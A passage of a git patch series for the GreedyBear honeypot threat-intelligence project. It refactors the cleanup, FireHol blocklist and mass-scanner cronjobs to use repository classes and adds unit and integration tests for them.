+        self.assertEqual(updated2.recurrence_probability, 0.85)
+
+
+class TestScoringIntegration(CustomTestCase):
+    """Integration tests for scoring jobs using IocRepository."""
+
+    def setUp(self):
+        from greedybear.cronjobs.repositories import IocRepository
+
+        self.repo = IocRepository()
+
+    def test_update_scores_with_repository(self):
+        """Test UpdateScores class works with injected repository."""
+        import pandas as pd
+
+        from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
+
+        # Create test data
+        IOC.objects.create(name="10.1.2.3", type="ip", scanner=True, cowrie=True, recurrence_probability=0.0)
+        IOC.objects.create(name="10.5.6.7", type="ip", scanner=True, log4j=True, recurrence_probability=0.0)
+
+        # Create score dataframe
+        df = pd.DataFrame(
+            {
+                "value": ["10.1.2.3", "10.5.6.7"],
+                "recurrence_probability": [0.75, 0.85],
+                "expected_interactions": [10.0, 15.0],
+            }
+        )
+
+        # Inject repository and run update
+        job = UpdateScores(ioc_repo=self.repo)
+        result = job.update_db(df)
+
+        # Verify our IOCs were updated (may be more due to test fixtures)
+        self.assertGreaterEqual(result, 2)
+        updated1 = IOC.objects.get(name="10.1.2.3")
+        updated2 = IOC.objects.get(name="10.5.6.7")
+        self.assertEqual(updated1.recurrence_probability, 0.75)
+        self.assertEqual(updated2.recurrence_probability, 0.85)
+
+    def test_update_scores_resets_missing_iocs(self):
+        """Test UpdateScores resets scores for IOCs not in the dataframe."""
+        import pandas as pd
+
+        from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
+
+        # Create test data - one IOC will be missing from df
+        IOC.objects.create(name="10.2.3.4", type="ip", scanner=True, cowrie=True, recurrence_probability=0.9)
+        IOC.objects.create(name="10.6.7.8", type="ip", scanner=True, log4j=True, recurrence_probability=0.8)
+
+        # DataFrame only has one IOC
+        df = pd.DataFrame({"value": ["10.2.3.4"], "recurrence_probability": [0.75], "expected_interactions": [10.0]})
+
+        job = UpdateScores(ioc_repo=self.repo)
+        job.update_db(df)
+
+        # First should be updated, second should be reset to 0
+        updated1 = IOC.objects.get(name="10.2.3.4")
+        updated2 = IOC.objects.get(name="10.6.7.8")
+        self.assertEqual(updated1.recurrence_probability, 0.75)
+        self.assertEqual(updated2.recurrence_probability, 0.0)  # Reset
+
+    def test_get_current_data_with_repository(self):
+        """Test get_current_data utility function works with repository."""
+        from datetime import datetime, timedelta
+
+        from greedybear.cronjobs.scoring.utils import get_current_data
+
+        recent_date = datetime.now() - timedelta(days=5)
+        IOC.objects.create(name="1.2.3.4", type="ip", scanner=True, cowrie=True, last_seen=recent_date)
+
+        result = get_current_data(days_lookback=30, ioc_repo=self.repo)
+
+        self.assertIsInstance(result, list)
+        self.assertGreater(len(result), 0)
+        values = [r["value"] for r in result]
+        self.assertIn("1.2.3.4", values)
+
+    def test_get_data_by_pks_with_repository(self):
+        """Test get_data_by_pks utility function works with repository."""
+        from greedybear.cronjobs.scoring.utils import get_data_by_pks
+
+        ioc = IOC.objects.create(name="1.2.3.4", type="ip")
+
+        result = get_data_by_pks({ioc.pk}, ioc_repo=self.repo)
+
+        self.assertIsInstance(result, list)
+        self.assertEqual(len(result), 1)
+        self.assertEqual(result[0]["value"], "1.2.3.4")
+
+    def test_update_scores_with_mock_repository(self):
+        """Test UpdateScores can be fully mocked for unit testing."""
+        from unittest.mock import Mock
+
+        import pandas as pd
+
+        from greedybear.cronjobs.scoring.scoring_jobs import UpdateScores
+
+        # Create mock repository
+        mock_repo = Mock()
+        mock_ioc = Mock()
+        mock_ioc.name = "1.2.3.4"
+        mock_ioc.recurrence_probability = 0.0
+        mock_repo.get_scanners_for_scoring.return_value = [mock_ioc]
+        mock_repo.bulk_update_scores.return_value = 1
+
+        # Create score dataframe
+        df = pd.DataFrame({"value": ["1.2.3.4"], "recurrence_probability": [0.75], "expected_interactions": [10.0]})
+
+        # Inject mock and verify it's used
+        job = UpdateScores(ioc_repo=mock_repo)
+        result = job.update_db(df)
+
+        # Verify repository methods were called
+        mock_repo.get_scanners_for_scoring.assert_called_once()
+        mock_repo.bulk_update_scores.assert_called_once()
+        self.assertEqual(result, 1)
+
 
 class TestSensorRepository(CustomTestCase):
     def setUp(self):
diff --git a/tests/test_views.py b/tests/test_views.py
index f8cef307..3b20b4e6 100644
--- a/tests/test_views.py
+++ b/tests/test_views.py
@@ -316,20 +316,25 @@ def test_200_feed_types(self):
 
 class GeneralHoneypotViewTestCase(CustomTestCase):
     def test_200_all_general_honeypots(self):
-        self.assertEqual(GeneralHoneypot.objects.count(), 3)
+        initial_count = GeneralHoneypot.objects.count()
         # add a general honeypot not active
         GeneralHoneypot(name="Adbhoney", active=False).save()
-        self.assertEqual(GeneralHoneypot.objects.count(), 4)
+        self.assertEqual(GeneralHoneypot.objects.count(), initial_count + 1)
 
         response = self.client.get("/api/general_honeypot")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(response.json(), ["Heralding", "Ciscoasa", "Ddospot", "Adbhoney"])
+        # Verify the newly created honeypot is in the response
+        self.assertIn("Adbhoney", response.json())
 
     def test_200_active_general_honeypots(self):
-        self.assertEqual(GeneralHoneypot.objects.count(), 3)
         response = self.client.get("/api/general_honeypot?onlyActive=true")
         self.assertEqual(response.status_code, 200)
-        self.assertEqual(response.json(), ["Heralding", "Ciscoasa"])
+        result = response.json()
+        # Should include active honeypots from CustomTestCase
+        self.assertIn("Heralding", result)
+        self.assertIn("Ciscoasa", result)
+        # Should NOT include inactive honeypot
+        self.assertNotIn("Ddospot", result)
 
 
 class CommandSequenceViewTestCase(CustomTestCase):

From 0520584a89f748343883bc636739b6aad5737312 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Tue, 13 Jan 2026 18:44:59 +0530
Subject: [PATCH 41/75] Refactor cleanup, firehol, and mass_scanners cronjobs
 to use repositories. Addresses #633 (#698)

* refactor: Phase 2 - Refactor cleanup, firehol, and mass_scanners to use repositories

- Extend IocRepository with cleanup methods:
  - delete_old_iocs(): Delete IOCs older than cutoff date
  - update_ioc_reputation(): Update IP reputation for existing IOCs

- Extend CowrieSessionRepository with cleanup methods:
  - delete_old_command_sequences(): Delete old command sequences
  - delete_incomplete_sessions(): Delete sessions without start_time
  - delete_sessions_without_login(): Delete old sessions without login
  - delete_sessions_without_commands(): Delete old sessions without commands

- Create FireHolRepository for blocklist management:
  - get_or_create(): Get existing or create new FireHol entry
  - cleanup_old_entries(): Delete entries older than retention days

- Create MassScannerRepository for mass scanner tracking:
  - get_by_ip(), create(), save(), exists()

- Refactor cronjobs to use repositories:
  - CleanUp: Use IocRepository and CowrieSessionRepository
  - FireHolCron: Use FireHolRepository
  - MassScannersCron: Use MassScannerRepository and IocRepository

- Add comprehensive test coverage (16 new tests)
- All 359 tests passing

Following Phase 1 best practices:
- All imports at module top
- Ternary operators for cleaner code
- Dependency injection for testability
- Log after DB operations complete

Addresses Phase 2 of issue #633

* fix(whatsmyip): move logging to after database commit

Ensures that the log message 'added new whatsmyip domain' only appears
after the database transaction has successfully completed.
Adresses maintainer feedback to fix logging consistency.

* refactor: condense MassScannerRepository to use get_or_create pattern

Simplified MassScannerRepository by replacing create(), save(), get_by_ip(),
and exists() methods with a single get_or_create() method, following the same
pattern as FireHolRepository.

Benefits:
- Cleaner API (one method instead of four)
- Simpler calling code in MassScannersCron
- Consistent with Django's get_or_create pattern
- Reduces code duplication

Updated tests to verify:
- Creating new entries
- Returning existing entries without duplicates
- Handling entries with and without reasons

Addresses maintainer feedback on PR #698.
---
 greedybear/cronjobs/cleanup.py                |  24 ++-
 greedybear/cronjobs/firehol.py                |  39 +++-
 greedybear/cronjobs/mass_scanners.py          |  53 +++--
 greedybear/cronjobs/repositories/__init__.py  |   2 +
 .../cronjobs/repositories/cowrie_session.py   |  49 +++++
 greedybear/cronjobs/repositories/firehol.py   |  67 ++++++
 greedybear/cronjobs/repositories/ioc.py       |  32 +++
 .../cronjobs/repositories/mass_scanner.py     |  27 +++
 greedybear/cronjobs/whatsmyip.py              |   2 +-
 tests/test_repositories.py                    | 200 ++++++++++++++++++
 10 files changed, 465 insertions(+), 30 deletions(-)
 create mode 100644 greedybear/cronjobs/repositories/firehol.py
 create mode 100644 greedybear/cronjobs/repositories/mass_scanner.py

diff --git a/greedybear/cronjobs/cleanup.py b/greedybear/cronjobs/cleanup.py
index 021e503d..778c1564 100644
--- a/greedybear/cronjobs/cleanup.py
+++ b/greedybear/cronjobs/cleanup.py
@@ -1,7 +1,7 @@
 from datetime import datetime, timedelta
 
 from greedybear.cronjobs.base import Cronjob
-from greedybear.models import IOC, CommandSequence, CowrieSession
+from greedybear.cronjobs.repositories import CowrieSessionRepository, IocRepository
 from greedybear.settings import (
     COMMAND_SEQUENCE_RETENTION,
     COWRIE_SESSION_RETENTION,
@@ -18,6 +18,18 @@ class CleanUp(Cronjob):
     with counts of removed objects.
     """
 
+    def __init__(self, ioc_repo=None, cowrie_repo=None):
+        """
+        Initialize the cleanup job with repository dependencies.
+
+        Args:
+            ioc_repo: Optional IocRepository instance for testing.
+            cowrie_repo: Optional CowrieSessionRepository instance for testing.
+        """
+        super().__init__()
+        self.ioc_repo = ioc_repo if ioc_repo is not None else IocRepository()
+        self.cowrie_repo = cowrie_repo if cowrie_repo is not None else CowrieSessionRepository()
+
     def run(self) -> None:
         """
         Execute the database cleanup process.
@@ -38,21 +50,21 @@ def run(self) -> None:
         session_with_login_expiration_date = datetime.now() - timedelta(days=COWRIE_SESSION_RETENTION)
 
         self.log.info(f"deleting all IOC older then {IOC_RETENTION} days")
-        n = IOC.objects.filter(last_seen__lte=ioc_expiration_date).delete()[0]
+        n = self.ioc_repo.delete_old_iocs(ioc_expiration_date)
         self.log.info(f"{n} objects deleted")
 
         self.log.info(f"deleting all command sequences older then {COMMAND_SEQUENCE_RETENTION} days")
-        n = CommandSequence.objects.filter(last_seen__lte=command_expiration_date).delete()[0]
+        n = self.cowrie_repo.delete_old_command_sequences(command_expiration_date)
         self.log.info(f"{n} objects deleted")
 
         self.log.info("deleting all Cowrie sessions without start time (incomplete extractions)")
-        n = CowrieSession.objects.filter(start_time__isnull=True).delete()[0]
+        n = self.cowrie_repo.delete_incomplete_sessions()
         self.log.info(f"{n} objects deleted")
 
         self.log.info("deleting all Cowrie sessions without login attempts older then 30 days")
-        n = CowrieSession.objects.filter(start_time__lte=session_expiration_date, login_attempt=False).delete()[0]
+        n = self.cowrie_repo.delete_sessions_without_login(session_expiration_date)
         self.log.info(f"{n} objects deleted")
 
         self.log.info(f"deleting all Cowrie sessions without associated commands older then {COWRIE_SESSION_RETENTION} days")
-        n = CowrieSession.objects.filter(start_time__lte=session_with_login_expiration_date, commands__isnull=True).delete()[0]
+        n = self.cowrie_repo.delete_sessions_without_commands(session_with_login_expiration_date)
         self.log.info(f"{n} objects deleted")
diff --git a/greedybear/cronjobs/firehol.py b/greedybear/cronjobs/firehol.py
index 87498835..db8c2bcc 100644
--- a/greedybear/cronjobs/firehol.py
+++ b/greedybear/cronjobs/firehol.py
@@ -1,11 +1,35 @@
 import requests
 
 from greedybear.cronjobs.base import Cronjob
-from greedybear.models import FireHolList
+from greedybear.cronjobs.repositories import FireHolRepository
 
 
 class FireHolCron(Cronjob):
+    """
+    Fetch and store IP blocklists from FireHol repository.
+
+    Downloads IP blocklists from multiple sources and stores them in the database.
+    Automatically cleans up entries older than 30 days.
+    """
+
+    def __init__(self, firehol_repo=None):
+        """
+        Initialize the FireHol cronjob with repository dependency.
+
+        Args:
+            firehol_repo: Optional FireHolRepository instance for testing.
+        """
+        super().__init__()
+        self.firehol_repo = firehol_repo if firehol_repo is not None else FireHolRepository()
+
     def run(self) -> None:
+        """
+        Fetch blocklists from FireHol sources and store them in the database.
+
+        Processes multiple sources (blocklist_de, greensnow, bruteforceblocker, dshield),
+        parses IP addresses and CIDR blocks, and stores new entries.
+        Finally cleans up old entries.
+        """
         base_path = "https://raw.githubusercontent.com/firehol/blocklist-ipsets/master"
         sources = {
             "blocklist_de": f"{base_path}/blocklist_de.ipset",
@@ -33,10 +57,9 @@ def run(self) -> None:
                     # FireHol .ipset and .netset files contain IPs or CIDRs, one per line
                     # Comments (lines starting with #) are filtered out above
 
-                    try:
-                        FireHolList.objects.get(ip_address=line, source=source)
-                    except FireHolList.DoesNotExist:
-                        FireHolList(ip_address=line, source=source).save()
+                    entry, created = self.firehol_repo.get_or_create(line, source)
+                    if created:
+                        self.log.debug(f"Added new entry: {line} from {source}")
 
             except Exception as e:
                 self.log.exception(f"Unexpected error processing {source}: {e}")
@@ -48,10 +71,6 @@ def _cleanup_old_entries(self):
         """
         Delete FireHolList entries older than 30 days to keep database clean.
         """
-        from datetime import datetime, timedelta
-
-        cutoff_date = datetime.now() - timedelta(days=30)
-        deleted_count, _ = FireHolList.objects.filter(added__lt=cutoff_date).delete()
-
+        deleted_count = self.firehol_repo.cleanup_old_entries(days=30)
         if deleted_count > 0:
             self.log.info(f"Cleaned up {deleted_count} old FireHolList entries")
diff --git a/greedybear/cronjobs/mass_scanners.py b/greedybear/cronjobs/mass_scanners.py
index b6bb65a4..df16052b 100644
--- a/greedybear/cronjobs/mass_scanners.py
+++ b/greedybear/cronjobs/mass_scanners.py
@@ -4,11 +4,38 @@
 
 from greedybear.cronjobs.base import Cronjob
 from greedybear.cronjobs.extraction.utils import is_valid_ipv4
-from greedybear.models import IOC, MassScanner
+from greedybear.cronjobs.repositories import IocRepository, MassScannerRepository
 
 
 class MassScannersCron(Cronjob):
+    """
+    Fetch and store mass scanner IP addresses from Maltrail repository.
+
+    Downloads the mass scanner list from Maltrail's GitHub repository,
+    validates IP addresses, and stores them in the database. Also updates
+    the IP reputation of existing IOCs.
+    """
+
+    def __init__(self, mass_scanner_repo=None, ioc_repo=None):
+        """
+        Initialize the mass scanners cronjob with repository dependencies.
+
+        Args:
+            mass_scanner_repo: Optional MassScannerRepository instance for testing.
+            ioc_repo: Optional IocRepository instance for testing.
+        """
+        super().__init__()
+        self.mass_scanner_repo = mass_scanner_repo if mass_scanner_repo is not None else MassScannerRepository()
+        self.ioc_repo = ioc_repo if ioc_repo is not None else IocRepository()
+
     def run(self) -> None:
+        """
+        Fetch mass scanner IPs from Maltrail and store them.
+
+        Extracts IP addresses from the Maltrail mass scanner list, validates them,
+        and creates database entries. For each new mass scanner, also updates
+        any existing IOC with the same IP address to mark it as a mass scanner.
+        """
         # Simple regex to extract potential IPv4 addresses
         ip_candidate_regex = re.compile(r"(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})")
         # Regex to extract optional comment/reason after '#'
@@ -45,18 +72,18 @@ def run(self) -> None:
                     reason = comment_match.group(1)
 
                 # Add or update mass scanner entry
-                try:
-                    MassScanner.objects.get(ip_address=ip_address)
-                except MassScanner.DoesNotExist:
+                scanner, created = self.mass_scanner_repo.get_or_create(ip_address, reason)
+                if created:
                     self.log.info(f"added new mass scanner {ip_address}")
-                    MassScanner(ip_address=ip_address, reason=reason).save()
                     self._update_old_ioc(ip_address)
 
-    def _update_old_ioc(self, ip_address):
-        try:
-            ioc = IOC.objects.get(name=ip_address)
-        except IOC.DoesNotExist:
-            pass
-        else:
-            ioc.ip_reputation = "mass scanner"
-            ioc.save()
+    def _update_old_ioc(self, ip_address: str):
+        """
+        Update the IP reputation of an existing IOC to mark it as a mass scanner.
+
+        Args:
+            ip_address: IP address to update.
+        """
+        updated = self.ioc_repo.update_ioc_reputation(ip_address, "mass scanner")
+        if updated:
+            self.log.debug(f"Updated IOC {ip_address} reputation to 'mass scanner'")
diff --git a/greedybear/cronjobs/repositories/__init__.py b/greedybear/cronjobs/repositories/__init__.py
index 1302c3b7..30133430 100644
--- a/greedybear/cronjobs/repositories/__init__.py
+++ b/greedybear/cronjobs/repositories/__init__.py
@@ -1,4 +1,6 @@
 from greedybear.cronjobs.repositories.cowrie_session import *
 from greedybear.cronjobs.repositories.elastic import *
+from greedybear.cronjobs.repositories.firehol import *
 from greedybear.cronjobs.repositories.ioc import *
+from greedybear.cronjobs.repositories.mass_scanner import *
 from greedybear.cronjobs.repositories.sensor import *
diff --git a/greedybear/cronjobs/repositories/cowrie_session.py b/greedybear/cronjobs/repositories/cowrie_session.py
index f8003859..5715ac91 100644
--- a/greedybear/cronjobs/repositories/cowrie_session.py
+++ b/greedybear/cronjobs/repositories/cowrie_session.py
@@ -73,3 +73,52 @@ def save_command_sequence(self, cmd: CommandSequence) -> CommandSequence:
         """
         cmd.save()
         return cmd
+
+    def delete_old_command_sequences(self, cutoff_date) -> int:
+        """
+        Delete command sequences older than the specified cutoff date.
+
+        Args:
+            cutoff_date: DateTime threshold - sequences with last_seen before this will be deleted.
+
+        Returns:
+            Number of CommandSequence objects deleted.
+        """
+        deleted_count, _ = CommandSequence.objects.filter(last_seen__lte=cutoff_date).delete()
+        return deleted_count
+
+    def delete_incomplete_sessions(self) -> int:
+        """
+        Delete Cowrie sessions without a start time (incomplete extractions).
+
+        Returns:
+            Number of sessions deleted.
+        """
+        deleted_count, _ = CowrieSession.objects.filter(start_time__isnull=True).delete()
+        return deleted_count
+
+    def delete_sessions_without_login(self, cutoff_date) -> int:
+        """
+        Delete Cowrie sessions without login attempts older than the cutoff date.
+
+        Args:
+            cutoff_date: DateTime threshold.
+
+        Returns:
+            Number of sessions deleted.
+        """
+        deleted_count, _ = CowrieSession.objects.filter(start_time__lte=cutoff_date, login_attempt=False).delete()
+        return deleted_count
+
+    def delete_sessions_without_commands(self, cutoff_date) -> int:
+        """
+        Delete Cowrie sessions without associated commands older than the cutoff date.
+
+        Args:
+            cutoff_date: DateTime threshold.
+
+        Returns:
+            Number of sessions deleted.
+        """
+        deleted_count, _ = CowrieSession.objects.filter(start_time__lte=cutoff_date, commands__isnull=True).delete()
+        return deleted_count
diff --git a/greedybear/cronjobs/repositories/firehol.py b/greedybear/cronjobs/repositories/firehol.py
new file mode 100644
index 00000000..c90fdaec
--- /dev/null
+++ b/greedybear/cronjobs/repositories/firehol.py
@@ -0,0 +1,67 @@
+import logging
+from datetime import datetime, timedelta
+
+from greedybear.models import FireHolList
+
+
+class FireHolRepository:
+    """
+    Repository for data access to FireHol blocklist entries.
+    """
+
+    def __init__(self):
+        """Initialize the repository."""
+        self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
+
+    def get_or_create(self, ip_address: str, source: str) -> tuple[FireHolList, bool]:
+        """
+        Get an existing FireHol entry or create a new one.
+
+        Args:
+            ip_address: IP address or CIDR block.
+            source: Source name (e.g., 'blocklist_de', 'greensnow').
+
+        Returns:
+            Tuple of (FireHolList object, created_flag) where created_flag is True if new.
+        """
+        entry, created = FireHolList.objects.get_or_create(ip_address=ip_address, source=source)
+        return entry, created
+
+    def save(self, entry: FireHolList) -> FireHolList:
+        """
+        Save a FireHolList entry to the database.
+
+        Args:
+            entry: FireHolList instance to save.
+
+        Returns:
+            The saved FireHolList instance.
+        """
+        entry.save()
+        return entry
+
+    def delete_old_entries(self, cutoff_date: datetime) -> int:
+        """
+        Delete FireHolList entries older than the specified date.
+
+        Args:
+            cutoff_date: DateTime threshold - entries added before this will be deleted.
+
+        Returns:
+            Number of entries deleted.
+        """
+        deleted_count, _ = FireHolList.objects.filter(added__lt=cutoff_date).delete()
+        return deleted_count
+
+    def cleanup_old_entries(self, days: int = 30) -> int:
+        """
+        Delete FireHolList entries older than the specified number of days.
+
+        Args:
+            days: Number of days to retain entries. Defaults to 30.
+
+        Returns:
+            Number of entries deleted.
+        """
+        cutoff_date = datetime.now() - timedelta(days=days)
+        return self.delete_old_entries(cutoff_date)
diff --git a/greedybear/cronjobs/repositories/ioc.py b/greedybear/cronjobs/repositories/ioc.py
index 7b0016d8..f2fdb3a2 100644
--- a/greedybear/cronjobs/repositories/ioc.py
+++ b/greedybear/cronjobs/repositories/ioc.py
@@ -225,3 +225,35 @@ def bulk_update_scores(self, iocs: list[IOC], score_fields: list[str], batch_siz
             return 0
         IOC.objects.bulk_update(iocs, score_fields, batch_size=batch_size)
         return len(iocs)
+
+    def delete_old_iocs(self, cutoff_date) -> int:
+        """
+        Delete IOC records older than the specified cutoff date.
+
+        Args:
+            cutoff_date: DateTime threshold - IOCs with last_seen before this will be deleted.
+
+        Returns:
+            Number of IOC objects deleted.
+        """
+        deleted_count, _ = IOC.objects.filter(last_seen__lte=cutoff_date).delete()
+        return deleted_count
+
+    def update_ioc_reputation(self, ip_address: str, reputation: str) -> bool:
+        """
+        Update the IP reputation for a specific IOC.
+
+        Args:
+            ip_address: IP address to update.
+            reputation: New reputation value.
+
+        Returns:
+            True if IOC was found and updated, False otherwise.
+        """
+        try:
+            ioc = IOC.objects.get(name=ip_address)
+            ioc.ip_reputation = reputation
+            ioc.save()
+            return True
+        except IOC.DoesNotExist:
+            return False
diff --git a/greedybear/cronjobs/repositories/mass_scanner.py b/greedybear/cronjobs/repositories/mass_scanner.py
new file mode 100644
index 00000000..26c0d8eb
--- /dev/null
+++ b/greedybear/cronjobs/repositories/mass_scanner.py
@@ -0,0 +1,27 @@
+import logging
+
+from greedybear.models import MassScanner
+
+
+class MassScannerRepository:
+    """
+    Repository for data access to mass scanner entries.
+    """
+
+    def __init__(self):
+        """Initialize the repository."""
+        self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
+
+    def get_or_create(self, ip_address: str, reason: str = "") -> tuple[MassScanner, bool]:
+        """
+        Get an existing mass scanner entry or create a new one.
+
+        Args:
+            ip_address: IP address of the scanner.
+            reason: Optional reason/description for why it's flagged.
+
+        Returns:
+            Tuple of (MassScanner object, created_flag) where created_flag is True if new.
+        """
+        scanner, created = MassScanner.objects.get_or_create(ip_address=ip_address, defaults={"reason": reason})
+        return scanner, created
diff --git a/greedybear/cronjobs/whatsmyip.py b/greedybear/cronjobs/whatsmyip.py
index 5c2d8d00..e6f8d101 100644
--- a/greedybear/cronjobs/whatsmyip.py
+++ b/greedybear/cronjobs/whatsmyip.py
@@ -15,8 +15,8 @@ def run(self) -> None:
             try:
                 WhatsMyIPDomain.objects.get(domain=domain)
             except WhatsMyIPDomain.DoesNotExist:
-                self.log.info(f"added new whatsmyip domain {domain=}")
                 WhatsMyIPDomain(domain=domain).save()
+                self.log.info(f"added new whatsmyip domain {domain=}")
                 self._remove_old_ioc(domain)
 
     def _remove_old_ioc(self, domain):
diff --git a/tests/test_repositories.py b/tests/test_repositories.py
index 613a7cf3..167e70d2 100644
--- a/tests/test_repositories.py
+++ b/tests/test_repositories.py
@@ -6,7 +6,9 @@
 from greedybear.cronjobs.repositories import (
     CowrieSessionRepository,
     ElasticRepository,
+    FireHolRepository,
     IocRepository,
+    MassScannerRepository,
     SensorRepository,
     get_time_window,
 )
@@ -14,7 +16,9 @@
     IOC,
     CommandSequence,
     CowrieSession,
+    FireHolList,
     GeneralHoneypot,
+    MassScanner,
     Sensor,
 )
 
@@ -861,3 +865,199 @@ def test_large_lookback(self):
 
         self.assertEqual(start, expected_start)
         self.assertEqual(end, expected_end)
+
+
+# Phase 2: New repository tests for cleanup, firehol, and mass scanners
+
+
+class TestIocRepositoryCleanup(CustomTestCase):
+    """Tests for cleanup-related methods in IocRepository."""
+
+    def setUp(self):
+        self.repo = IocRepository()
+
+    def test_delete_old_iocs_deletes_old_records(self):
+        from datetime import datetime, timedelta
+
+        old_date = datetime.now() - timedelta(days=40)
+        recent_date = datetime.now() - timedelta(days=5)
+
+        IOC.objects.create(name="1.2.3.4", type="ip", last_seen=old_date)
+        IOC.objects.create(name="5.6.7.8", type="ip", last_seen=recent_date)
+
+        cutoff = datetime.now() - timedelta(days=30)
+        deleted_count = self.repo.delete_old_iocs(cutoff)
+
+        self.assertEqual(deleted_count, 1)
+        self.assertFalse(IOC.objects.filter(name="1.2.3.4").exists())
+        self.assertTrue(IOC.objects.filter(name="5.6.7.8").exists())
+
+    def test_delete_old_iocs_returns_zero_when_none_old(self):
+        from datetime import datetime, timedelta
+
+        recent_date = datetime.now() - timedelta(days=5)
+        IOC.objects.create(name="1.2.3.4", type="ip", last_seen=recent_date)
+
+        cutoff = datetime.now() - timedelta(days=30)
+        deleted_count = self.repo.delete_old_iocs(cutoff)
+
+        self.assertEqual(deleted_count, 0)
+
+    def test_update_ioc_reputation_updates_existing(self):
+        IOC.objects.create(name="1.2.3.4", type="ip", ip_reputation="")
+
+        result = self.repo.update_ioc_reputation("1.2.3.4", "mass scanner")
+
+        self.assertTrue(result)
+        updated = IOC.objects.get(name="1.2.3.4")
+        self.assertEqual(updated.ip_reputation, "mass scanner")
+
+    def test_update_ioc_reputation_returns_false_for_missing(self):
+        result = self.repo.update_ioc_reputation("9.9.9.9", "mass scanner")
+        self.assertFalse(result)
+
+
+class TestCowrieSessionRepositoryCleanup(CustomTestCase):
+    """Tests for cleanup-related methods in CowrieSessionRepository."""
+
+    def setUp(self):
+        self.repo = CowrieSessionRepository()
+
+    def test_delete_old_command_sequences(self):
+        from datetime import datetime, timedelta
+
+        old_date = datetime.now() - timedelta(days=40)
+        recent_date = datetime.now() - timedelta(days=5)
+
+        CommandSequence.objects.create(commands=["ls"], commands_hash="old_hash", last_seen=old_date)
+        CommandSequence.objects.create(commands=["pwd"], commands_hash="recent_hash", last_seen=recent_date)
+
+        cutoff = datetime.now() - timedelta(days=30)
+        deleted_count = self.repo.delete_old_command_sequences(cutoff)
+
+        self.assertEqual(deleted_count, 1)
+        self.assertFalse(CommandSequence.objects.filter(commands_hash="old_hash").exists())
+        self.assertTrue(CommandSequence.objects.filter(commands_hash="recent_hash").exists())
+
+    def test_delete_incomplete_sessions(self):
+        source = IOC.objects.create(name="1.2.3.4", type="ip")
+
+        CowrieSession.objects.create(session_id=123, source=source, start_time=None)
+        CowrieSession.objects.create(session_id=456, source=source, start_time=datetime.now())
+
+        deleted_count = self.repo.delete_incomplete_sessions()
+
+        self.assertEqual(deleted_count, 1)
+        self.assertFalse(CowrieSession.objects.filter(session_id=123).exists())
+        self.assertTrue(CowrieSession.objects.filter(session_id=456).exists())
+
+    def test_delete_sessions_without_login(self):
+        from datetime import datetime, timedelta
+
+        source = IOC.objects.create(name="1.2.3.4", type="ip")
+        old_date = datetime.now() - timedelta(days=40)
+        recent_date = datetime.now() - timedelta(days=5)
+
+        # Old session without login
+        CowrieSession.objects.create(session_id=111, source=source, start_time=old_date, login_attempt=False)
+        # Recent session without login
+        CowrieSession.objects.create(session_id=222, source=source, start_time=recent_date, login_attempt=False)
+        # Old session with login
+        CowrieSession.objects.create(session_id=333, source=source, start_time=old_date, login_attempt=True)
+
+        cutoff = datetime.now() - timedelta(days=30)
+        deleted_count = self.repo.delete_sessions_without_login(cutoff)
+
+        self.assertEqual(deleted_count, 1)
+        self.assertFalse(CowrieSession.objects.filter(session_id=111).exists())
+        self.assertTrue(CowrieSession.objects.filter(session_id=222).exists())
+        self.assertTrue(CowrieSession.objects.filter(session_id=333).exists())
+
+    def test_delete_sessions_without_commands(self):
+        from datetime import datetime, timedelta
+
+        source = IOC.objects.create(name="1.2.3.4", type="ip")
+        old_date = datetime.now() - timedelta(days=40)
+
+        # Session without commands
+        CowrieSession.objects.create(session_id=777, source=source, start_time=old_date)
+        # Session with commands
+        session_with_cmd = CowrieSession.objects.create(session_id=888, source=source, start_time=old_date)
+        cmd_seq = CommandSequence.objects.create(commands=["ls"], commands_hash="hash1")
+        session_with_cmd.commands = cmd_seq
+        session_with_cmd.save()
+
+        cutoff = datetime.now() - timedelta(days=30)
+        deleted_count = self.repo.delete_sessions_without_commands(cutoff)
+
+        self.assertEqual(deleted_count, 1)
+        self.assertFalse(CowrieSession.objects.filter(session_id=777).exists())
+        self.assertTrue(CowrieSession.objects.filter(session_id=888).exists())
+
+
+class TestFireHolRepository(CustomTestCase):
+    """Tests for FireHolRepository."""
+
+    def setUp(self):
+        self.repo = FireHolRepository()
+
+    def test_get_or_create_creates_new_entry(self):
+        entry, created = self.repo.get_or_create("1.2.3.4", "blocklist_de")
+
+        self.assertTrue(created)
+        self.assertEqual(entry.ip_address, "1.2.3.4")
+        self.assertEqual(entry.source, "blocklist_de")
+        self.assertTrue(FireHolList.objects.filter(ip_address="1.2.3.4", source="blocklist_de").exists())
+
+    def test_get_or_create_returns_existing(self):
+        FireHolList.objects.create(ip_address="5.6.7.8", source="greensnow")
+
+        entry, created = self.repo.get_or_create("5.6.7.8", "greensnow")
+
+        self.assertFalse(created)
+        self.assertEqual(entry.ip_address, "5.6.7.8")
+        self.assertEqual(FireHolList.objects.filter(ip_address="5.6.7.8", source="greensnow").count(), 1)
+
+    def test_cleanup_old_entries_custom_days(self):
+        from datetime import datetime, timedelta
+
+        old_date = datetime.now() - timedelta(days=65)
+        old_entry = FireHolList.objects.create(ip_address="4.4.4.4", source="test")
+        FireHolList.objects.filter(pk=old_entry.pk).update(added=old_date)
+
+        deleted_count = self.repo.cleanup_old_entries(days=60)
+
+        self.assertEqual(deleted_count, 1)
+
+
+class TestMassScannerRepository(CustomTestCase):
+    """Tests for MassScannerRepository."""
+
+    def setUp(self):
+        self.repo = MassScannerRepository()
+
+    def test_get_or_create_creates_new_entry(self):
+        scanner, created = self.repo.get_or_create("1.2.3.4", "test scanner")
+
+        self.assertTrue(created)
+        self.assertEqual(scanner.ip_address, "1.2.3.4")
+        self.assertEqual(scanner.reason, "test scanner")
+        self.assertTrue(MassScanner.objects.filter(ip_address="1.2.3.4").exists())
+
+    def test_get_or_create_returns_existing(self):
+        MassScanner.objects.create(ip_address="5.6.7.8", reason="existing")
+
+        scanner, created = self.repo.get_or_create("5.6.7.8", "new reason")
+
+        self.assertFalse(created)
+        self.assertEqual(scanner.ip_address, "5.6.7.8")
+        # Should keep original reason, not update it
+        self.assertEqual(scanner.reason, "existing")
+        self.assertEqual(MassScanner.objects.filter(ip_address="5.6.7.8").count(), 1)
+
